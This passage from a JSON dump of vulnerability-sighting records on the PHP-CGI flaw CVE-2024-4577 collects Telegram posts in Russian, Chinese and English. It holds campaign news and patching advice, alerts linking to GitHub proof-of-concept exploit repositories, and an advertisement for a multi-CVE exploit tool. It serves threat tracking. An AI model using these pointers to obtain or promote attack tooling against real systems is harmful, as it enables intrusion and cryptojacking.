\u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u0441 IMDSv1 \u043d\u0430 IMDSv2 \u2014 \u044d\u0442\u043e\u0442 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0442\u043e\u043a\u0435\u043d \u0432 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u0435, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 SSRF-\u0430\u0442\u0430\u043a\u0438 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c\u0438.\n\n\u0410\u043d\u0430\u043b\u0438\u0437 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0439 \u0437\u0430 \u0433\u043e\u0434 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u044b\u0439 \u0440\u043e\u0441\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u0442\u0440\u0435\u043c \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c: CVE-2019-9082 \u043f\u043e\u0441\u0442\u0435\u043f\u0435\u043d\u043d\u043e \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u0440\u0430\u0434\u0430\u0440\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445, CVE-2024-4577 \u0431\u044b\u0441\u0442\u0440\u043e \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c, \u0430 CVE-2022-47945 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c.\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u0438\u0437\u043c\u0435\u043d\u043d\u044b\u043c\u0438: \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a WAF . \u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432\u0430\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0438\u0442\u044c \u0437\u0430 \u0442\u0440\u0430\u0444\u0438\u043a\u043e\u043c \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 outbound-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043d\u0430 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0435 \u0438\u043b\u0438 \u0443\u0442\u0435\u0447\u043a\u0443 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-04-11T05:27:59.000000Z"}, {"uuid": "2b5cf10e-7cb9-4177-a6a3-18f2bd154d5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/itsec_news/5552", "content": "\u200b\u26a1\ufe0f\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP \u043f\u0440\u0435\u0432\u0440\u0430\u0442\u0438\u043b\u0430 \u0442\u044b\u0441\u044f\u0447\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0432 \u0442\u0435\u043d\u0435\u0432\u044b\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u0444\u0435\u0440\u043c\u044b\n\n\ud83d\udcac \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-4577 \u0432 PHP \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0442\u0440\u043e\u044f\u043d\u043e\u0432 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (RAT), \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a Quasar RAT. \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0435\u0439 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0432 PHP \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Windows, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u0432 \u0440\u0435\u0436\u0438\u043c\u0435 CGI, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Bitdefender, \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 CVE-2024-4577 \u0440\u0435\u0437\u043a\u043e \u0443\u0447\u0430\u0441\u0442\u0438\u043b\u0438\u0441\u044c \u0441 \u043a\u043e\u043d\u0446\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432 \u0422\u0430\u0439\u0432\u0430\u043d\u0435 (54,65% \u0432\u0441\u0435\u0445 \u0430\u0442\u0430\u043a), \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0435 (27,06%), \u0411\u0440\u0430\u0437\u0438\u043b\u0438\u0438 (16,39%), \u042f\u043f\u043e\u043d\u0438\u0438 (1,57%) \u0438 \u0418\u043d\u0434\u0438\u0438 (0,33%). \u041f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 15% \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0430\u0442\u0430\u043a \u0432\u043a\u043b\u044e\u0447\u0430\u043b\u0438 \u0431\u0430\u0437\u043e\u0432\u044b\u0435 \u0442\u0435\u0441\u0442\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u043c\u0430\u043d\u0434 \u00abwhoami\u00bb \u0438\u043b\u0438 \u00abecho \u00bb, \u0430 \u0435\u0449\u0451 15% \u043a\u0430\u0441\u0430\u043b\u0438\u0441\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438: \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432, \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0441\u0435\u0442\u0438, \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445, \u0434\u043e\u043c\u0435\u043d\u0435 \u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u041f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 5% \u0430\u0442\u0430\u043a \u043f\u0440\u0438\u0432\u0435\u043b\u0438 \u043a \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 XMRig \u2014 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0435\u0433\u043e \u0432\u044b\u0447\u0438\u0441\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043c\u043e\u0449\u043d\u043e\u0441\u0442\u0438 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u043c\u0430\u0448\u0438\u043d. \u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, Bitdefender \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0443\u044e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u043b\u0438 \u043c\u0430\u0439\u043d\u0435\u0440\u044b Nicehash, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f \u0438\u0445 \u043f\u043e\u0434 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u00abjavawindows.exe\u00bb, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f.\n\n\u041a\u0440\u043e\u043c\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0442\u0440\u043e\u044f\u043d\u043e\u0432 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0441\u043b\u0443\u0447\u0430\u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 Quasar RAT, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 MSI-\u0444\u0430\u0439\u043b\u043e\u0432 \u0447\u0435\u0440\u0435\u0437 \u00abcmd.exe\u00bb \u0441 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.\n\n\u041b\u044e\u0431\u043e\u043f\u044b\u0442\u043d\u043e\u0439 \u0434\u0435\u0442\u0430\u043b\u044c\u044e \u0441\u0442\u0430\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430 \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445, \u0447\u0442\u043e\u0431\u044b \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c IP-\u0430\u0434\u0440\u0435\u0441\u0430\u043c. \u042d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u0432\u0438\u0434\u0435\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u043e \u0431\u043e\u0440\u044c\u0431\u0435 \u043c\u0435\u0436\u0434\u0443 \u043a\u043e\u043d\u043a\u0443\u0440\u0438\u0440\u0443\u044e\u0449\u0438\u043c\u0438 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0434\u0436\u0435\u043a\u0435\u0440\u043e\u0432, \u043f\u044b\u0442\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0443\u0436\u0435 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c. \u041f\u043e\u0434\u043e\u0431\u043d\u0430\u044f \u0442\u0430\u043a\u0442\u0438\u043a\u0430 \u0440\u0430\u043d\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u043a\u043e\u043d\u043a\u0443\u0440\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u043f\u0435\u0440\u0435\u0434 \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435\u043c \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e.\n\n\u041d\u0435\u0434\u0430\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Cisco Talos \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 , \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u044f\u043f\u043e\u043d\u0441\u043a\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0441\u0440\u043e\u0447\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c PHP \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438, \u0447\u0442\u043e\u0431\u044b \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0440\u0438\u0441\u043a\u0438. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 Windows, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a PowerShell, \u0440\u0430\u0437\u0440\u0435\u0448\u0438\u0432 \u0438\u0445 \u0437\u0430\u043f\u0443\u0441\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-03-20T11:22:30.000000Z"}, {"uuid": "4aa3344d-51d7-4936-a54b-d5c0806a017c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7667", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPHP CGI Remote Code Execution (CVE-2024-4577) PoC\nURL\uff1ahttps://github.com/sug4r-wr41th/CVE-2024-4577\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-15T18:08:45.000000Z"}, {"uuid": "e85d71ba-6a82-463d-bf8f-f722c30b58e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/32684", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPHP CGI Parameter Injection Vulnerability (RCE: Remote Code Execution)\nURL\uff1ahttps://github.com/Gill-Singh-A/CVE-2024-4577-Exploit\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-04-18T11:10:46.000000Z"}, {"uuid": "3e2e8670-ed95-4bb0-b81c-fa159db07a7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8462", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAutomated PHP remote code execution scanner for CVE-2024-4577\nURL\uff1ahttps://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-06T03:57:32.000000Z"}, {"uuid": "40521327-c87a-4d9f-a2ac-34a32147cc2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/claytechsolution/191", "content": "The Hacker News\nPHP-CGI RCE Flaw Exploited in Attacks on Japan's Tech, Telecom, and E-Commerce Sectors\n\nThreat actors of unknown provenance have been attributed to a malicious campaign predominantly targeting organizations in Japan since January 2025.\n\"The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines,\" Cisco Talos researcher Chetan Raghuprasad said in a technical", "creation_timestamp": "2025-03-07T07:59:56.000000Z"}, {"uuid": "3800405a-3d57-482b-bd4c-4ff2eead0190", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/4435", "content": "CVE     : CVE-2024-4577\n  Exploit : PHP CGI Argument Injection\n  Channel : https://t.me/oxlogs", "creation_timestamp": "2025-05-04T07:31:22.000000Z"}, {"uuid": "0ba6402a-6b65-461c-986a-1e778f398414", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/6BgLO1Ext21JAsRbM-STQVTUB3hXLryNkkSmFI7DaKNc1Rs", "content": "", "creation_timestamp": "2024-11-17T07:07:14.000000Z"}, {"uuid": "985c243c-89ae-49fe-ac6d-1f99ab298ce4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/GUltDbtTxxobfZgdIqfEzDzJvC6jagJfD_8ie8LgyoxjQtU", "content": "", "creation_timestamp": "2024-11-16T15:25:07.000000Z"}, {"uuid": "e5e7d97e-a091-4e5c-96d5-4193fc8e5a52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/sDe_NvnZzosyJDQL5AFCzTRjhrPu0XzfD6ayEIcobXB5NsE", "content": "", "creation_timestamp": "2025-06-23T09:00:05.000000Z"}, {"uuid": "dd36ddb1-aa29-47e0-8b05-e11d0d0fb3dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/3301", "content": "CvEploiterv2 x xWPv3 [Ultimate/Beast Software.]\n\n[The most advanced software for CV 2024 expl0its and WordPress vulnerabilities\n     with the latest version/method.]\n\n1x => CVE-2024-38761 - Wordpress [Zephyr Project Manager] < Unauthenticated Information Exposure.\n\n2x => CVE-2024-38759 - Wordpress [Search & Replace] < Unauthenticated PHP Object Injection.\n\n3x => CVE-2024-6313 - Wordpress [Gutenberg Forms] < Unauthenticated Arbitrary File Upload.\n\n4x => CVE-2024-6164 - Wordpress [Filter & Grids] < Unauthenticated Local File Inclusion.\n\n5x => CVE-2024-40348 - \n[Bazarr] < Unauthenticated Arbitrary File Read.\n\n6x => CVE-2024-4295 - Wordpress [Email Subscribers by Icegram Expres] < Unauthenticated SQL Injection via Hash.\n\n7x => CVE-2024-4577 - PHP [CGI] < Unauthenticated Command Injection.\n\n8x => CVE-2024-4836 - [Edito CMS] < Unauthenticated Sensitive Data Leak.\n\n9x => CVE-2024-32399 - RaidenMAILD [MailServer] < Unauthenticated Path Traversal.\n\nEnjoy;", "creation_timestamp": "2025-03-16T00:41:48.000000Z"}, {"uuid": "96f78c48-3e81-442c-a12e-81a0763dade7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/vassal_of_the_Joker/1839", "content": "\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u0445 \u0432 PHP \u0438 Windows: \u0430\u043d\u0430\u043b\u0438\u0437 \u0430\u0442\u0430\u043a CVE-2024-4577 \u0438 ZDI-CAN-25373", "creation_timestamp": "2025-06-08T13:04:47.000000Z"}, {"uuid": "8498b463-c7e7-4c57-b130-32d3a115fba8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/kasperskyb2b/1297", "content": "\u2708\ufe0f \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\udda5 \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u043f\u043e \u044d\u0432\u043e\u043b\u044e\u0446\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437 \u0432 I \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430: \u041f\u041a, \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u044b\u0435 \u0443\u0433\u0440\u043e\u0437\u044b, \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b, \u0443\u0433\u0440\u043e\u0437\u044b \u0410\u0421\u0423 \u0422\u041f.\n\n\ud83d\udd0c \u041d\u043e\u0432\u0430\u044f \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u044c \u043a\u0438\u0431\u0435\u0440-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 \u2014 \u043e\u0447\u0438\u0449\u0430\u044e\u0442 \u0438 \u0443\u0433\u043e\u043d\u044f\u044e\u0442 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b Github.\n\nCVE-2024-4577 \u0432 PHP \u0434\u043b\u044f Windows \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 RCE, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0443\u0436\u0435 \u043f\u044b\u0442\u0430\u044e\u0442\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c. Patch now. \u0414\u043b\u044f \u0442\u0435\u0445, \u043a\u0442\u043e \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f 